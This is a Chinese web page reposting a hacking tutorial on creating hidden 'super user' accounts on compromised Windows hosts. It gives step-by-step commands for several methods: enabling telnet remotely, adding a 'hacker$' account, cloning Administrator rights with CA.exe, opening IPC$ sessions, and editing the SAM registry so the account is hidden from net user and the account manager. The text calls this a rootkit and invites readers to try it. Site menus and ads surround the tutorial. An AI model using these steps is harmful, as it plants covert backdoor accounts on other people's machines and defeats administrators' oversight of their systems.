HI,欢迎您光临本站,秉承服务宗旨,销售只是起点,服务永无止境!
    • 短视频文案
      • 励志哲理
      • 名言美句
      • 情感语录
      • 回复热评
      • 解说文案
    • 短视频素材
      • 情感励志
      • 美食小吃
      • 体育运动
      • 生活人文
      • 妙招好物
      • 风景风光
      • 影音娱乐
      • 颜值时尚
      • 游戏动漫
      • 自然景观
    • 短视频课程
      • 同城课程
      • 带货课程
      • 投放课程
      • 玩法课程
    • 中视频素材
    • 短视频工具
    • 副业项目
资源分享吧
  • 首页
  • CMS模板host
    • DEDECMS模板965
    • 易优CMS318
    • WordPress模板146
    • Discuz模板101
    • 帝国CMS102
    • 苹果cms78
    • Pbootcms24
    • zblog模板2
  • 整站源码
    • 教育/交友/直播76
    • 商城/淘宝/网店26
    • 门户/论坛/信息27
    • 小说/新闻/博客76
    • 电影/视频/音乐22
    • 图片/素材/下载49
    • 支付/金融/货币356
    • 导航/目录/友链25
    • 会员/推广/任务57
    • 公众号/小程序/游戏133
  • 一元夺宝new
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    一比一精仿电影挖片网苹果cmsv10模板
    一比一精仿电影挖片网苹果cmsv10模板
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    蓝色清晰织梦资源网下载站源码
    蓝色清晰织梦资源网下载站源码
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    织梦蓝色图纸展示类企业网站源码
    织梦蓝色图纸展示类企业网站源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    prev
    next
  • 网页素材
    • 网页游戏148
    • 网页模板4723
    • 特效代码5467
  • 办公素材
    • PPT模板377
    • 简历模板0
  • 站长学院
    • DEDE教程352
    • wordpress教程416
    • SEO教程124
    • 其它文档教程13
  • 更多
    • 办公教程4
    • 群辉教程12
    • 电脑基础7124
    • GPS导航
    • 安卓系统15
      • Android资讯2
      • ROM0
      • 教程工具0
    • Win系统169
      • Windows XP3
      • Windows 77
      • Windows 80
      • Windows 1012
      • 服务器系统1129
      • Win主题12
      • Win教程26
      • Win资讯0
      • Win软件98
    • 站点标签
    • 更新日志
    • 其他10
登录/注册
  • 精品会员专享
  • 会员折扣下载
  • 每日海量更新
立即开通 开通会员抄底价
当前位置:资源分享吧 > 克隆账户隐藏超级用户创建全接触
也想出现在这里? 联系我们吧

克隆账户隐藏超级用户创建全接触

作者 : 小编 本文共4211个字,预计阅读时间需要11分钟 发布时间: 2021-06-15 共3.42K人阅读
也想出现在这里? 联系我们吧

一、利用帐户克隆工具来创建  Clone Administrator(CA.exe),利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号(此普通帐号必须已经存在)。克隆得到的帐号具有和系统内置的Administrator同样的设置,并且用NET命令或者用户管理器也发现不了其权限已经被提升,是一个不错的ROOT KIT。  现在,我们就来看看如何利用帐户克隆工具在肉鸡上创建隐藏的超级用户。    利用流光、SuperScan等进行扫描,假设已经扫描到一远程主机的Administrator帐户,其密码为123。我们可以使用DameWare Mini Remote Control(简称DMRC),在图形界面(GUI)中来远程控制远程主机。也可以使用OpenTelnet.exe工具来开启远程主机的TELNET服务,其命令格式为:OpenTelnet.exe \\\\server username password NTLMAuthor telnetport,使用命令:opentelnet \\\\192.XX.XX.2 Administrator "123" 0 99,呵呵,没想这么成功容易就开启肉鸡的TELNET吧!接着使用命令:Telnet 192.XX.XX.2 99,输入帐户及密码,成功获取一SHELL。     首先想办法查看一下有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然也会禁用其他用户。在图形界面下,非常容易识别,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉。但在命令行状态下,只能使用命令:“net user 用户名”一个一个来查看用户是否被禁用。如果懒得这样麻烦,可自行建立一个新的帐户,命令为:“Net user hacker$ youkou /add”,然后使用命令:“Net user hacker$ /active:no”来停用此帐户。     断开与远程主机的连接,用小榕的超级用户克隆程序CA.exe,将被禁用的用户hacker$克隆成超级用户,命令为:CA.EXE \\\\192.XX.XX.2 Administrator 123 hacker$ youkou,成功!     这时,hacker$就成为了超级用户,并有具有和Administrator同样的设置(桌面、菜单等等)。但还是得检查一下,用CCA.exe,命令如下:cca \\\\192.XX.XX.2 administrator 123。     看到这一行返回信息没有?“[hacker$] AS SAME AS [Administrator]”,说明hacker$帐户和Administrator相同,克隆成功。    二、图形界面建隐藏超级用户  恐怕我们最熟悉的就是在图形界面下进行操作了,这对于在本地计算机、3389终端服务肉鸡或使用DMRC等控制的肉鸡上创建隐藏超级用户 再好不过了。    大家知道吗?Windows 2000中有两个注册表编辑器:Regedit.exe和Regedt32.exe,Windows XP中Regedit.exe和Regedt32.exe实为一个程序,修改键值的权限时在右键快捷菜单中选择“权限”来修改。对Regedit.exe我想大家都很熟悉,但却不能对注册表的键进行权限设置,而Regedt32.exe最大的优点就是能够对注册表的项键设置权限。Windows NT/2000/XP的帐户信息都在注册表的HKEY_LOCAL_MACHINE\\SAM\\SAM键下,但是除了系统用户SYSTEM外,其他用户都没有权限查看到其中的信息,因此首先得用Regedt32.exe对“HKEY_LOCAL_MACHINE\\SAM\\SAM”键设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写操作。    首先在肉鸡中创建一个新的帐户hacker$,可以在帐户管理器中建立,也可以使用命令:net user hacker$ 123 /add 来创建。然后通过“开始”菜单中的“运行”,输入regedt32.exe,点击“确定”后就打开了注册表编辑器。依次展开子键HKEY_LOCAL_MACHINE\\SAM\\SAM,用鼠标右键单击,在弹出的快捷菜单中选择“权限”项。     在出现的“SAM 权限”对话窗口中,点击“添加”将我登录时的帐户添加到“组或用户名称”列表中,这里我是以administrator的身份登录的,所以我就将administrator加入,在下部的权限功能区设置权限为“完全控制”。     小提示:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以后,再来这里将你添加的帐户删除即可。    如果还是不能展开子键,请关闭后重新打开,如果是Windows 2000的机器,请关闭这个注册表编辑器,重新打开“regedit.exe”。展开子键:HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\hacker$,在其右侧窗口中发现其默认值为0x3F1。     下面将hacker$键、hacker$对应的项000003F1以及administrator所对应的项000001F4导出为hacker.reg、3EE.reg和1f4.reg,退出注册表编辑器。用记事本分别打开这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键“F”的值复制,并覆盖hacker$对应的项000003EE下的键“F”的值,然后将hacker.reg和3EE.reg合并为hacker.reg。 接下来在命令行下执行net user hacker$ /del将用户hacker$删除,最后再将hacker.reg导入注册表即可。    现在,隐藏的超级用户hacker$已经建好了。打开regedt32.exe,把HKEY_LOCAL_MACHINE\\SAM\\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。    注意:隐藏的超级用户建好后,就能在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。    三、命令行建立隐藏超级用户  首先通过使用OpenTelnet.exe工具来开启远程主机的TELNET服务,然后TELNET远程登陆得到一个shell,创建一个新的帐户,命令为:  net user hacker$ youkou /add,然后就来导出注册表项HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users,运行命令:  regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\,其中/e 是regedit.exe的参数,在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users这个键的一定要以“\\”结尾。     断开TELNET连接,建立IPC会话:net use \\\\192.XX.XX.2\\ipc$ "123" /user:"administrator,然后将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy \\\\192.XX.XX.2\\D$\\hacker.reg,用记事本编辑,将超级用户对应的项000001F4下的键“F”的值复制,并覆盖hacker$对应的项000003EE下的键“F”的值(hacker$对应的项在不同的机器而不同),编辑好后再上传:copy hacker.reg \\\\192.XX.XX.2\\D$\\hacker1.reg 。    再TELNET到远程主机,使用命令net user hacker$ /del删除hacker$帐户,然后把hacker.reg导入,命令为:regedit.exe /s hacker.reg,其中参数/s表示以安静模式导入。这样就成功创建了一个隐藏的超级用户。    四、连接远程肉鸡注册表创建  还有一个比较简单方便的办法,就是通过控制台以及注册表编辑器“文件”菜单中的“连接网络注册表”功能来完成隐藏超级用户的创建。    通过“开始”菜单中的“运行”,输入MMC,回车后即打开了控制台,打开“文件”菜单中的“添加/删除管理单元”(快捷键CTRL+M),在出现的对话框中点击“添加”按钮,在出现的“添加独立管理单元”对话框中的列表中选择“本地用户和组”。     单击“添加”即弹出“选择目标机器”对话框,选中“另一台计算机”,在其后输入远程计算机的IP地址,点击“完成”。     一路关闭返回至控制台窗口,我们就可对远程计算机进行组和用户的管理了,在右侧窗口空白处右击,在弹出的快捷选择“新用户”建立一帐户hacker$吧!    我们知道,regedit.exe、regedt32.exe都有连接网络注册表的功能,我们可以用regedt32.exe来为远程主机的注册表项设置权限,用regedit.exe来编辑远程注册表。导出相应注册项,然后进行编辑修改(同上面介绍相似)。    现在在“控制台”中删除刚建立的帐户hacker$,然后关闭。然后在注册表编辑器中通过“文件”菜单中的“导入”功能将上面导出的文件导入即可。    如果远程主机没有开启远程注册表服务,请自行开启,因为你一开始就已经拥有其管理员帐户密码。    五、需注意的几点事项  1、隐藏的超级用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。  2、隐藏的超级用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的超级用户就会暴露在帐户管理器中,而且不能删除。    3、如在本机上创建隐藏的超级用户时,最好用系统自带的备份工具先备份好注册表。    想不想在电脑上大显身手?自己动手试一试吧!

入侵检测 入侵防御 入侵防御和入侵检测 入侵防御系统的作用 网络攻击防御
1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 克隆账户隐藏超级用户创建全接触

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html
小编

小编 VIP

分享到:
上一篇
安全中国提取权限过程 图文
下一篇
九种突破IDS入侵检测系统的实用方法

发表评论 取消回复

要发表评论,您必须先登录。

最新文章
餐饮火锅加盟网站pbootcms模板源码
餐饮火锅加盟网站pbootcms模板源码
源码下载新闻资讯博客网站pbootcms模板
源码下载新闻资讯博客网站pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
红色火锅加盟网站pbootcms模板源码
红色火锅加盟网站pbootcms模板源码
蓝色源码钢结构工程基建网站pbootcms模板
蓝色源码钢结构工程基建网站pbootcms模板
标签云
DEDECMS (483) dedecms教程 (326) eyoucms (270) html (364) html5 (1717) html模板 (733) Linux (1245) linux教程 (1245) wordpress教程 (380) 下载 (277) 代码 (816) 企业网站模板 (874) 企业网站模板下载 (874) 免费企业网站模板 (874) 入侵防御 (270) 公司网站模板 (874) 切换 (502) 动画 (594) 国内网站模板 (324) 图片 (582) 技术网络漏洞 (347) 插件 (447) 效果 (765) 源码 (381) 漏洞 (371) 漏洞分析 (347) 特效 (789) 电脑使用 (4064) 电脑操作 (4064) 短视频素材 (606) 笔记本电脑价格 (4037) 笔记本电脑品牌排行 (4037) 笔记本电脑知识 (4037) 笔记本电脑评测 (4037) 素材 (483) 织梦 (407) 织梦教程 (342) 网站模板 (436) 网站源码 (417) 网站漏洞检测 (347) 网络安全WEB漏洞 (347) 菜单 (299) 视频 (376) 这是 (345) 鼠标 (417)

限时优惠

【阿里云】云产品采购季,助力行业复工。新用户专享1折起,云服务器低至0.75折,更多产品可叠加专属代金券下单
立即查看

相关推荐

安全狗下加用户的又一方法
小编小编

安全狗下加用户的又一方法

上次发了安全狗下加用户的另一方法,据说不够风骚…所以这次要淫荡一点 方法同样很简单,不过不知道有没有人发过。。PS: 转载请不要注明作者 0×01 测试环境: 安全狗的进程: .安全狗的服务 .开启远程桌面守护 .远程登录测试...
  • 4.62K
  • 免费
  • 下载
系统泄露密码的入侵攻击分析
小编小编

系统泄露密码的入侵攻击分析

WINDOWS访问139端口时自动用当前用户、密码连接,造成泄露用户密码,虽然其密码是加密的,但一样可以用来攻击。   下面是SMB的密码认证方式。   WINDOWS的139口的访问过程,箭头表示数据方向:   1.客户端<—...
  • 1.16K
  • 免费
  • 下载
黑客入侵之Radmin 4899端口的详细步骤
小编小编

黑客入侵之Radmin 4899端口的详细步骤

如果您是一位大虾,或者您已经对入侵4899了如指掌,那您可以不必浪费时间看这篇文章,本文是专门写给初学者的,给广大初学者了解一下~~ 一:下载Remote Administrator(简称Radmin) 二:把Radmin的密码,选项和安装服务设置好,...
  • 2.89K
  • 免费
  • 下载
黑客之入侵Linux实例
小编小编

黑客之入侵Linux实例

我发现了一个网站,于是常规入侵。很好,它的FINGER开着,于是我编了一个SHELL,aaa帐号试到zzz(这是我发现的一个网上规律,那就是帐号的长度与口令的强度成正比, 如果一个帐号只有两三位长,那它的口令一般也很简单,反之亦然,故且称之为若氏定理吧...
  • 2.54K
  • 免费
  • 下载
  • 417本站运营(天)
  • 8383用户总数
  • 3540资源数(个)
  • 0近7天更新(个)
  • 10973资源大小(GB)
加入VIP获取全站资源

「资源分享吧」 ZYFX8.CN

国内极具人气的网络源码资源交流学习平台
下载源码文章,学软件教程,找灵感素材,尽在「资源分享吧」

按Ctrl+D收藏本站

找资源就上「 资源分享吧 」

WWW.ZYFX8.CN

资源分享吧

资源分享吧(www.zyfx8.cn)是一家专门做精品素材的网站,网站以网站源码、网站模板、网页特效为主要内容,以“共享创造价值”为理念,以“尊重原创”为准则。

本站导航
  • 热门标签
  • 网站专题
  • 站点地图
更多导航
  • 申请友链
  • 用户协议
  • 免责声明
快速搜索
    友情链接 自助申请友链
  • RiTheme主题
  • wordpress主题
  • 在线PS修图
  • 源码下载
  • 网站模板
  • 资源分享吧
Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
资源分享吧(www.zyfx8.cn)是一家专门做精品素材的网站,以“共享创造价值”为理念,以“尊重原创”为准则。
  • 会员特惠
  • 签到
  • 客服

    在线客服

    点我联系

    直接说出您的需求!
    切记!带上资源链接与问题!

    工作时间: 9:30-21:30

  • 更新
    日历
  • 全屏
  • 首页

  • 签到

  • 切换

  • 客服

资源分享吧
  • 登录
  • 注册
or
or
忘记密码?
资源分享吧
  • 首页
  • CMS模板host ►
    • DEDECMS模板965
    • 易优CMS318
    • WordPress模板146
    • Discuz模板101
    • 帝国CMS102
    • 苹果cms78
    • Pbootcms24
    • zblog模板2
  • 整站源码 ►
    • 教育/交友/直播76
    • 商城/淘宝/网店26
    • 门户/论坛/信息27
    • 小说/新闻/博客76
    • 电影/视频/音乐22
    • 图片/素材/下载49
    • 支付/金融/货币356
    • 导航/目录/友链25
    • 会员/推广/任务57
    • 公众号/小程序/游戏133
  • 一元夺宝new
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    一比一精仿电影挖片网苹果cmsv10模板
    一比一精仿电影挖片网苹果cmsv10模板
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    蓝色清晰织梦资源网下载站源码
    蓝色清晰织梦资源网下载站源码
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    织梦蓝色图纸展示类企业网站源码
    织梦蓝色图纸展示类企业网站源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    prev
    next
  • 网页素材 ►
    • 网页游戏148
    • 网页模板4723
    • 特效代码5467
  • 办公素材 ►
    • PPT模板377
    • 简历模板0
  • 站长学院 ►
    • DEDE教程352
    • wordpress教程416
    • SEO教程124
    • 其它文档教程13
  • 更多 ►
    • 办公教程4
    • 群辉教程12
    • 电脑基础7124
    • GPS导航
    • 安卓系统15 ►
      • Android资讯2
      • ROM0
      • 教程工具0
    • Win系统169 ►
      • Windows XP3
      • Windows 77
      • Windows 80
      • Windows 1012
      • 服务器系统1129
      • Win主题12
      • Win教程26
      • Win资讯0
      • Win软件98
    • 站点标签
    • 更新日志
    • 其他10
文章展示
交易所源码搭建教程java多语言部署
交易所源码搭建教程java多语言部署
餐饮火锅加盟网站pbootcms模板源码
餐饮火锅加盟网站pbootcms模板源码
源码下载新闻资讯博客网站pbootcms模板
源码下载新闻资讯博客网站pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
红色火锅加盟网站pbootcms模板源码
红色火锅加盟网站pbootcms模板源码
蓝色源码钢结构工程基建网站pbootcms模板
蓝色源码钢结构工程基建网站pbootcms模板
开通VIP 享更多特权,建议使用QQ登录
账号登录/注册
QQ登录
微博登录
×

    回馈用户限时特惠

    「 资源分享吧 」国内极具人气的网络资源交流学习平台,海量资源每天更新,优质资源畅快下载

    终身SVIP原价 590元,国庆限时活动价仅需 “ 59元 ”,终身免费~~机不可失~~


    立即开通永久会员>>